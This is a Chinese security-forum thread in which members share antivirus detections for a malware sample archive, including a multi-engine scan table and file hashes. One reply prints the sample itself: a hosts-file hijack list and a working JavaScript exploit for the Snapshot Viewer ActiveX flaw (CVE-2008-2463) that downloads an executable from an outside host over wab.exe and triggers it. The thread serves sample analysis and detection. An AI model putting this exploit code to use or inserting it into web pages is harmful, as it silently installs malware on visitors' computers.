收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 mcafee检测
返回列表 发新帖
查看: 2649|回复: 9
收起左侧

[病毒样本] mcafee检测

[复制链接]
kingmuro
头像被屏蔽
发表于 2009-2-16 12:30:34 | 显示全部楼层 |阅读模式

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

mofunzone
发表于 2009-2-16 12:42:13 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Users\Administrator\Desktop\1virus.rar'
C:\Users\Administrator\Desktop\1virus.rar
  [0] Archive type: RAR
    [NOTE]      The file was deleted!
    --> as[1].htm
      [DETECTION] Contains HEUR/HTML.Malware suspicious code
回复

举报

cliffboy
发表于 2009-2-16 12:46:19 | 显示全部楼层
瑞星~
Hack.Exploit.Script.JS.OESnap.a
回复

举报

eubyo
发表于 2009-2-16 12:59:20 | 显示全部楼层
127.0.0.1       v.onondown.com.cn
127.0.0.2       ymsdasdw1.cn
127.0.0.3       h96b.info
127.0.0.0       www.bypk.com
127.0.0.1       va9sdhun23.cn
127.0.0.2       bnasnd83nd.cn
127.0.0.0       www.gamehacker.com.cn
127.0.0.0       gamehacker.com.cn
127.0.0.3       adlaji.cn
127.0.0.1       858656.com
127.1.1.1       bnasnd83nd.cn
127.0.0.1       my123.com
127.0.0.0       user1.12-27.net
127.0.0.1       8749.com
127.0.0.0       fengent.cn
127.0.0.1       4199.com
127.0.0.1       user1.16-22.net
127.0.0.1       7379.com
127.0.0.1       2be37c5f.3f6e2cc5f0b.com
127.0.0.1       7255.com
127.0.0.1       user1.23-12.net
127.0.0.1       3448.com
127.0.0.1       www.guccia.net
127.0.0.1       7939.com
127.0.0.1       a.o1o1o1.nEt
127.0.0.1       8009.com
127.0.0.1       user1.12-73.cn
127.0.0.1       piaoxue.com
127.0.0.1       3n8nlasd.cn
127.0.0.1       kzdh.com
127.0.0.0       www.sony888.cn
127.0.0.1       about.blank.la
127.0.0.0       user1.asp-33.cn
127.0.0.1       6781.com
127.0.0.0       www.netkwek.cn
127.0.0.1       7322.com
127.0.0.0       ymsdkad6.cn
127.0.0.1       localhost
127.0.0.0       www.lkwueir.cn
127.0.0.1       06.jacai.com
127.0.1.1       user1.23-17.net
127.0.0.1       1.jopenkk.com
127.0.0.0       upa.luzhiai.net
127.0.0.1       1.jopenqc.com
127.0.0.0       www.guccia.net
127.0.0.1       1.joppnqq.com
127.0.0.0       4m9mnlmi.cn
127.0.0.1       1.xqhgm.com
127.0.0.0       mm119mkssd.cn
127.0.0.1       100.332233.com
127.0.0.0       61.128.171.115:8080
127.0.0.1       121.11.90.79
127.0.0.0       www.1119111.com
127.0.0.1       121565.net
127.0.0.0       win.nihao69.cn
127.0.0.1       125.90.88.38
127.0.0.1       16888.6to23.com
127.0.0.1       2.joppnqq.com
127.0.0.0       puc.lianxiac.net
127.0.0.1       204.177.92.68
127.0.0.0       pud.lianxiac.net
127.0.0.1       210.74.145.236
127.0.0.0       210.76.0.133
127.0.0.1       219.129.239.220
127.0.0.0       61.166.32.2
127.0.0.1       219.153.40.221
127.0.0.0       218.92.186.27
127.0.0.1       219.153.46.27
127.0.0.0       www.fsfsfag.cn
127.0.0.1       219.153.52.123
127.0.0.0       ovo.ovovov.cn
127.0.0.1       221.195.42.71
127.0.0.0       dw.com.com
127.0.0.1       222.73.218.115
127.0.0.1       203.110.168.233:80
127.0.0.1       3.joppnqq.com
127.0.0.1       203.110.168.221:80
127.0.0.1       363xx.com
127.0.0.1       www1.ip10086.com.cm
127.0.0.1       4199.com
127.0.0.1       blog.ip10086.com.cn
127.0.0.1       43242.com
127.0.0.1       www.ccji68.cn
127.0.0.1       5.xqhgm.com
127.0.0.0       t.myblank.cn
127.0.0.1       520.mm5208.com
127.0.0.0       x.myblank.cn
127.0.0.1       59.34.131.54
127.0.0.1       210.51.45.5
127.0.0.1       59.34.198.228
127.0.0.1       www.ew1q.cn
127.0.0.1       59.34.198.88
127.0.0.1       59.34.198.97
127.0.0.1       60.190.114.101
127.0.0.1       60.190.218.34
127.0.0.0       qq-xing.com.cn
127.0.0.1       60.191.124.252
127.0.0.1       61.145.117.212
127.0.0.1       61.157.109.222
127.0.0.1       75.126.3.216
127.0.0.1       75.126.3.217
127.0.0.1       75.126.3.218
127.0.0.0       59.125.231.177:17777
127.0.0.1       75.126.3.220
127.0.0.1       75.126.3.221
127.0.0.1       75.126.3.222
127.0.0.1       772630.com
127.0.0.1       832823.cn
127.0.0.1       8749.com
127.0.0.1       888.jopenqc.com
127.0.0.1       89382.cn
127.0.0.1       8v8.biz
127.0.0.1       97725.com
127.0.0.1       9gg.biz
127.0.0.1       www.9000music.com
127.0.0.1       test.591jx.com
127.0.0.1       a.topxxxx.cn
127.0.0.1       picon.chinaren.com
127.0.0.1       www.5566.net
127.0.0.1       p.qqkx.com
127.0.0.1       news.netandtv.com
127.0.0.1       z.neter888.cn
127.0.0.1       b.myblank.cn
127.0.0.1       wvw.wokutu.com
127.0.0.1       unionch.qyule.com
127.0.0.1       www.qyule.com
127.0.0.1       it.itjc.cn
127.0.0.1       www.linkwww.com
127.0.0.1       vod.kaicn.com
127.0.0.1       www.tx8688.com
127.0.0.1       b.neter888.cn
127.0.0.1       promote.huanqiu.com
127.0.0.1       www.huanqiu.com
127.0.0.1       www.haokanla.com
127.0.0.1       play.unionsky.cn
127.0.0.1       www.52v.com
127.0.0.1       www.gghka.cn
127.0.0.1       icon.ajiang.net
127.0.0.1       new.ete.cn
127.0.0.1       www.stiae.cn
127.0.0.1       o.neter888.cn
127.0.0.1       comm.jinti.com
127.0.0.1       www.google-analytics.com
127.0.0.1       hz.mmstat.com
127.0.0.1       www.game175.cn
127.0.0.1       x.neter888.cn
127.0.0.1       z.neter888.cn
127.0.0.1       p.etimes888.com
127.0.0.1       hx.etimes888.com
127.0.0.1       abc.qqkx.com
127.0.0.1       dm.popdm.cn
127.0.0.1       www.yl9999.com
127.0.0.1       www.dajiadoushe.cn
127.0.0.1       v.onondown.com.cn
127.0.0.1       www.interoo.net
127.0.0.1       bally1.bally-bally.net
127.0.0.1       www.bao5605509.cn
127.0.0.1       www.rty456.cn
127.0.0.1       www.werqwer.cn
127.0.0.1       1.360-1.cn
127.0.0.1       user1.23-16.net
127.0.0.1       www.guccia.net
127.0.0.1       www.interoo.net
127.0.0.1       upa.netsool.net
127.0.0.1       js.users.51.la
127.0.0.1       vip2.51.la
127.0.0.1       web.51.la
127.0.0.1       qq.gong2008.com
127.0.0.1       2008tl.copyip.com
127.0.0.1       tla.laozihuolaile.cn
127.0.0.1       www.tx6868.cn
127.0.0.1       p001.tiloaiai.com
127.0.0.1       s1.tl8tl.com
127.0.0.1       s1.gong2008.com
127.0.0.1       4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1       2be37c5f.3f6e2cc5f0b.com

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycarss = new Array();
mycarss[0] = "c:/Program Files/Outlook Express/wab.exe";
mycarss[1] = "d:/Program Files/Outlook Express/wab.exe";
mycarss[2] = "e:/Program Files/Outlook Express/wab.exe";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in mycarss)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://www.jjjgo.cn/win.exe';
var buf2=mycarss[x];

obj.Zoom = 0;

obj.ShowNavigationButtons = false;

obj.AllowContextMenu = false;

obj.SnapshotPath = buf1;


try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

</script>
回复

举报

ledled
发表于 2009-2-16 13:28:46 | 显示全部楼层
to VB
回复

举报

gomu887
发表于 2009-2-16 14:07:11 | 显示全部楼层
C:\Documents and Settings\Administrator\桌面\1virus.rar>>as[1].htm        Script.SoftExploit.e        病毒        还未处理
回复

举报

FLogo
发表于 2009-2-16 14:43:56 | 显示全部楼层
to kaba kill,waiting for reply。。。
回复

举报

wrq
发表于 2009-2-16 16:38:24 | 显示全部楼层
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:  http://bbs.kafan.cn/attachment.p ... de&t=1234773474
Information:  Contains HEUR/HTML.Malware suspicious code  


--------------------------------------------------------------------------------
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.79, VDF 7.1.2.24
回复

举报

猪猪的一天
头像被屏蔽
发表于 2009-2-16 16:38:54 | 显示全部楼层
NOD32
正在扫描日志
病毒库版本: 3855 (20090216)
日期: 2009-2-16  时间: 16:38:13
已扫描的磁盘、文件夹和文件: C:\Documents and Settings\l\桌面\1virus.rar
C:\Documents and Settings\l\桌面\1virus.rar > RAR > as[1].htm - JS/Exploit.CVE-2008-2463 特洛伊木马
C:\Documents and Settings\l\桌面\1virus.rar > RAR > 088D2.TMP - Win32/Qhost 特洛伊木马
已扫描的对象数: 2
发现的威胁数: 2
已清除对象数:0
完成时间: 16:38:13  总扫描时间: 0 秒 (00:00:00)
回复

举报

zhubo393
发表于 2009-2-16 16:57:56 | 显示全部楼层
文件 1virus.rar 接收于 2009.02.16 09:54:30 (CET)
反病毒引擎版本最后更新扫描结果
a-squared4.0.0.932009.02.16-
AhnLab-V35.0.0.22009.02.16-
AntiVir7.9.0.792009.02.15HEUR/HTML.Malware
Authentium5.1.0.42009.02.15-
Avast4.8.1335.02009.02.15VBS:SnapshotView-A
AVG8.0.0.2372009.02.15Exploit
BitDefender7.22009.02.16-
CAT-QuickHeal10.002009.02.16-
ClamAV0.94.12009.02.16-
Comodo9782009.02.15-
DrWeb4.44.0.091702009.02.16-
eSafe7.0.17.02009.02.15-
eTrust-Vet31.6.63582009.02.14-
F-Prot4.4.4.562009.02.15-
F-Secure8.0.14470.02009.02.16-
Fortinet3.117.0.02009.02.15-
GData192009.02.16VBS:SnapshotView-A
IkarusT3.1.1.45.02009.02.16-
K7AntiVirus7.10.6302009.02.14-
Kaspersky7.0.0.1252009.02.16-
McAfee55272009.02.15Exploit-CVE2008-2463
McAfee+Artemis55272009.02.15Exploit-CVE2008-2463
Microsoft1.43062009.02.16Exploit:JS/Objsnapt.E
NOD3238552009.02.16JS/Exploit.CVE-2008-2463
Norman6.00.022009.02.13-
nProtect2009.1.8.02009.02.16-
Panda10.0.0.102009.02.15-
PCTools4.4.2.02009.02.15-
Prevx1V22009.02.16-
Rising21.17.01.002009.02.16Hack.Exploit.Script.JS.OESnap.a
SecureWeb-Gateway6.7.62009.02.16Heuristic.HTML.Malware
Sophos4.38.02009.02.16Troj/PsymeZ-Fam
Sunbelt3.2.1851.22009.02.12-
Symantec102009.02.16-
TheHacker6.3.2.1.2582009.02.16-
TrendMicro8.700.0.10042009.02.16-
VBA323.12.8.122009.02.16-
ViRobot2009.2.16.16082009.02.16-
VirusBuster4.5.11.02009.02.15-

附加信息
File size: 1878 bytes
MD5...: b60c2b616f8bcc2cd7f3a59918db963f
SHA1..: 5e1d9e9d55a4792f159fadef2d100ac72574e86e
SHA256: 4174664022d498b300606fa0415ed590c32fe79158b9d6c837b4fc268cc0688a
SHA512: 8ec505996440111365e07e1e4e93318ed3d17f3239b8b464cda86c15876734af<BR>6fa247d643b0ed22a6ba4e3db25cfa1b33c55a77e57a3cde5f541aac23778506<BR>
ssdeep: 48:Wm5UovK2TwR3YGANpm3hg8WpOVi8gsCp8Hphzi2nwcNL:WWDTBSgPt8gv4hWT<BR>iL<BR>
PEiD..: -
TrID..: File type identification<BR>RAR Archive (83.3%)<BR>REALbasic Project (16.6%)
PEInfo: -
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-24 22:24 , Processed in 0.131239 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表